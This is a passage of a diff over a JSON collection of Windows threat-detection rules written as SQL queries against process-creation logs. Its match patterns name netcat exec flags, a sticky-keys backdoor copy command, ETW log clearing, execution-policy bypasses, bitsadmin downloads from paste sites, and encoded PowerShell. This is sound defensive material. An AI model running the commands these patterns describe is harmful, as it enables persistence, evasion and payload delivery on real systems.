--exec %' ESCAPE '\\' OR CommandLine LIKE '% -vnl -e %' ESCAPE '\\' OR CommandLine LIKE '% --lua-exec %' ESCAPE '\\' OR CommandLine LIKE '% --sh-exec %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable'))" ], - "filename": "proc_creation_win_pua_netcat.yml" + "filename": "proc_creation_win_curl_execution.yml" }, { - "title": "New User Created Via Net.EXE With Never Expire Option", - "id": "b9f0e6f5-09b4-4358-bae4-08408705bd5c", + "title": "Potential Manage-bde.wsf Abuse To Proxy Execution", + "id": "c363385c-f75d-4753-a108-c1a8e28bdbda", "status": "test", - "description": "Detects creation of local users via the net.exe command with the option \"never expire\"", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential abuse of the \"manage-bde.wsf\" script as a LOLBIN to proxy execution", + "author": "oscd.community, Natalia Shornikova, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '%user%' ESCAPE '\\' AND CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%expires:never%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR OriginalFileName = 'wscript.exe') AND CommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') OR (((ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\') AND ParentCommandLine LIKE '%manage-bde.wsf%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_net_user_add_never_expire.yml" + "filename": "proc_creation_win_lolbin_manage_bde.yml" }, { - "title": "Suspicious Execution of InstallUtil To Download", - "id": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", + "title": "Potential PowerShell Execution Policy Tampering - ProcCreation", + "id": "cf2e938e-9a3e-4fe8-a347-411642b28a9f", "status": "experimental", - "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "description": "Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\InstallUtil.exe' ESCAPE '\\' OR OriginalFileName = 'InstallUtil.exe') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%\\\\ShellIds\\\\Microsoft.PowerShell\\\\ExecutionPolicy%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\PowerShell\\\\ExecutionPolicy%' ESCAPE '\\') AND (CommandLine LIKE '%Bypass%' ESCAPE '\\' OR CommandLine LIKE '%RemoteSigned%' ESCAPE '\\' OR CommandLine LIKE '%Unrestricted%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_installutil_download.yml" + "filename": "proc_creation_win_registry_set_unsecure_powershell_policy.yml" }, { - "title": "Suspicious Diantz Alternate Data Stream Execution", - "id": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", - "status": "test", - "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", - "author": "frack113", + "title": "Wscript Shell Run In CommandLine", + "id": "2c28c248-7f50-417a-9186-a85b223010ee", + "status": "experimental", + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Very Possible" + "Rare legitimate inline scripting by some administrators" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%diantz.exe%' ESCAPE '\\' AND CommandLine LIKE '%.cab%' ESCAPE '\\' AND CommandLine REGEXP ':[^\\\\]')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Wscript.%' ESCAPE '\\' AND CommandLine LIKE '%.Shell%' ESCAPE '\\' AND CommandLine LIKE '%.Run%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_diantz_ads.yml" + "filename": "proc_creation_win_script_wscript_shell_cli.yml" }, { - "title": "Suspicious Key Manager Access", - "id": "a4694263-59a8-4608-a3a0-6f8d3a51664c", + "title": "Pubprn.vbs Proxy Execution", + "id": "1fb76ab8-fa60-4b01-bddd-71e89bf555da", "status": "experimental", - "description": "Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the use of the 'Pubprn.vbs' Microsoft signed script to execute commands.", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1555.004" + "attack.defense_evasion", + "attack.t1216.001" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%keymgr%' ESCAPE '\\' AND CommandLine LIKE '%KRShowKeyMgr%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\pubprn.vbs%' ESCAPE '\\' AND CommandLine LIKE '%script:%' ESCAPE '\\')" ], - "filename": "proc_creation_win_rundll32_keymgr.yml" + "filename": "proc_creation_win_lolbin_pubprn.yml" }, { - "title": "Remote Code Execute via Winrm.vbs", - "id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", - "status": "test", - "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", - "author": "Julia Fomina, oscd.community", + "title": "Potential Process Injection Via Msra.EXE", + "id": "744a188b-0415-4792-896f-11ddb0588dbc", + "status": "experimental", + "description": "Detects potential process injection via Microsoft Remote Asssistance (Msra.exe) by looking at suspicious child processes spawned from the aforementioned process. It has been a target used by many threat actors and used for discovery and persistence tactics", + "author": "Alexander McDonald", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1055" ], "falsepositives": [ - "Unknown" + "Legitimate use of Msra.exe" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR OriginalFileName = 'cscript.exe') AND (CommandLine LIKE '%winrm%' ESCAPE '\\' AND CommandLine LIKE '%invoke Create wmicimv2/Win32\\_%' ESCAPE '\\' AND CommandLine LIKE '%-r:http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\msra.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%msra.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\arp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\route.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" + "filename": "proc_creation_win_msra_process_injection.yml" }, { - "title": "Potential Binary Impersonating Sysinternals Tools", - "id": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", + "title": "Suspicious Extexport Execution", + "id": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", "status": "experimental", - "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", + "description": "Extexport.exe loads dll and is execute from other folder the original path", "author": "frack113", "tags": [ - "attack.execution", "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AccessEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADExplorer64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ADInsight64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\adrestore64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autologon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Autoruns64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\autorunsc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Bginfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Cacheset64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Clockres64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Contig64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Coreinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CPUSTRES64.EXE' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ctrl2cap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Dbgview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dbgview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktops64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\disk2vhd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\diskext64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Diskmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\DiskView64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\du64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\efsdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\FindLinks64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\handle64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hex2dec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\junction64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ldmdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\listdlls64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\livekd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\loadOrdC64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\logonsessions64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\movefile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfault64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\notmyfaultc64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntfsinfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pendmoves64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pipelist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\portmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procdump64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Procmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psExec64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psfile64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psGetsid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psInfo64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pskill64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pslist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psLoggedon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psloglist64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pspasswd64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psping64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psService64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psshutdown64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pssuspend64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RAMMap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\RegDelNull64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regjump.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ru64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sdelete64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ShareEnum64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\shellRunas.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sigcheck64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\streams64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\strings64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sync64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Sysmon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpvcon64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tcpview64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Testlimit64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vmmap64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Volumeid64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whois64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Winobj64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ZoomIt64.exe' ESCAPE '\\') AND NOT ((Company IN ('Sysinternals - www.sysinternals.com', 'Sysinternals')) OR (Company = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%Extexport.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Extexport.exe' ESCAPE '\\' OR OriginalFileName = 'extexport.exe'))" ], - "filename": "proc_creation_win_sysinternals_tools_masquerading.yml" + "filename": "proc_creation_win_lolbin_extexport.yml" }, { - "title": "Persistence Via Sticky Key Backdoor", - "id": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", + "title": "Rundll32 InstallScreenSaver Execution", + "id": "15bd98ea-55f4-4d37-b09a-e7caa0fa2221", "status": "experimental", - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "author": "Sreeman", + "description": "An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io, TactiKoolSec", "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" + "attack.t1218.011", + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Legitimate installation of a new screensaver" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%/y %' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\windows\\\\system32\\\\cmd.exe C:\\\\windows\\\\system32\\\\sethc.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%InstallScreenSaver%' ESCAPE '\\')" ], - "filename": "proc_creation_win_cmd_sticky_keys_replace.yml" + "filename": "proc_creation_win_lolbin_rundll32_installscreensaver.yml" }, { - "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", - "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", + "title": "Remote Access Tool - LogMeIn Execution", + "id": "d85873ef-a0f8-4c48-a53a-6b621f11729d", "status": "test", - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'LMIGuardianSvc' OR Product = 'LMIGuardianSvc' OR Company = 'LogMeIn, Inc.'))" ], - "filename": "proc_creation_win_powershell_ath_remote_fxv_gpu_disablement_command.yml" + "filename": "proc_creation_win_remote_access_tools_logmein.yml" }, { - "title": "Disable of ETW Trace", - "id": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "status": "test", - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "author": "@neu5ron, Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", + "title": "Suspicious Download From File-Sharing Website Via Bitsadmin", + "id": "8518ed3d-f7c9-4601-a26c-f361a4256a0c", + "status": "experimental", + "description": "Detects usage of bitsadmin downloading a file from a suspicious domain", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" + "attack.persistence", + "attack.t1197", + "attack.s0190", + "attack.t1036.003" ], "falsepositives": [ - "Unknown" + "Some legitimate apps use this, but limited." ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%cl%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%clear-log%' ESCAPE '\\' AND CommandLine LIKE '%/Trace%' ESCAPE '\\') OR (CommandLine LIKE '%sl%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%set-log%' ESCAPE '\\' AND CommandLine LIKE '%/e:false%' ESCAPE '\\') OR (CommandLine LIKE '%logman%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\' AND CommandLine LIKE '%trace%' ESCAPE '\\' AND CommandLine LIKE '%--p%' ESCAPE '\\' AND CommandLine LIKE '%-ets%' ESCAPE '\\') OR CommandLine LIKE '%Remove-EtwTraceProvider%' ESCAPE '\\' OR (CommandLine LIKE '%Set-EtwTraceProvider%' ESCAPE '\\' AND CommandLine LIKE '%0x11%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR OriginalFileName = 'bitsadmin.exe') AND (CommandLine LIKE '% /transfer %' ESCAPE '\\' OR CommandLine LIKE '% /create %' ESCAPE '\\' OR CommandLine LIKE '% /addfile %' ESCAPE '\\') AND (CommandLine LIKE '%.ghostbin.co/%' ESCAPE '\\' OR CommandLine LIKE '%.hastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%.paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%anonfiles.com%' ESCAPE '\\' OR CommandLine LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR CommandLine LIKE '%ddns.net%' ESCAPE '\\' OR CommandLine LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%mediafire.com%' ESCAPE '\\' OR CommandLine LIKE '%mega.nz%' ESCAPE '\\' OR CommandLine LIKE '%paste.ee%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.com%' ESCAPE '\\' OR CommandLine LIKE '%pastebin.pl%' ESCAPE '\\' OR CommandLine LIKE '%pastetext.net%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.com%' ESCAPE '\\' OR CommandLine LIKE '%privatlab.net%' ESCAPE '\\' OR CommandLine LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR CommandLine LIKE '%send.exploit.in%' ESCAPE '\\' OR CommandLine LIKE '%sendspace.com%' ESCAPE '\\' OR CommandLine LIKE '%storage.googleapis.com%' ESCAPE '\\' OR CommandLine LIKE '%transfer.sh%' ESCAPE '\\' OR CommandLine LIKE '%ufile.io%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_etw_trace_evasion.yml" + "filename": "proc_creation_win_bitsadmin_download_file_sharing_domains.yml" }, { - "title": "TAIDOOR RAT DLL Load", - "id": "d1aa3382-abab-446f-96ea-4de52908210b", + "title": "Suspicious Encoded PowerShell Command Line", + "id": "ca2092a1-c273-4878-9b4b-0d60115bf5ea", "status": "test", - "description": "Detects specific process characteristics of Chinese TAIDOOR RAT malware load", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet)", + "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community", "tags": [ "attack.execution", - "attack.t1055.001" - ], - "falsepositives": [ - "Unknown" - ], - "level": "high", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%dll,MyStart%' ESCAPE '\\' OR CommandLine LIKE '%dll MyStart%' ESCAPE '\\') OR (CommandLine LIKE '% MyStart' ESCAPE '\\' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\')))" - ], - "filename": "proc_creation_win_apt_taidoor.yml" - }, - { - "title": "Potential BearLPE Exploitation", - "id": "931b6802-d6a6-4267-9ffa-526f57f22aaf", - "status": "test", - "description": "Detects potential exploitation of the BearLPE exploit using Task Scheduler \".job\" import arbitrary DACL write\\par", - "author": "Olaf Hartong", - "tags": [ - "attack.privilege_escalation", - "attack.t1053.005", - "car.2013-08-001" - ], - "falsepositives": [ - "Unknown" + "attack.t1059.001" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '%/change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/RU%' ESCAPE '\\' AND CommandLine LIKE '%/RP%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '% -e%' ESCAPE '\\' AND (CommandLine LIKE '% JAB%' ESCAPE '\\' OR CommandLine LIKE '% SUVYI%' ESCAPE '\\' OR CommandLine LIKE '% SQBFAFgA%' ESCAPE '\\' OR CommandLine LIKE '% aQBlAHgA%' ESCAPE 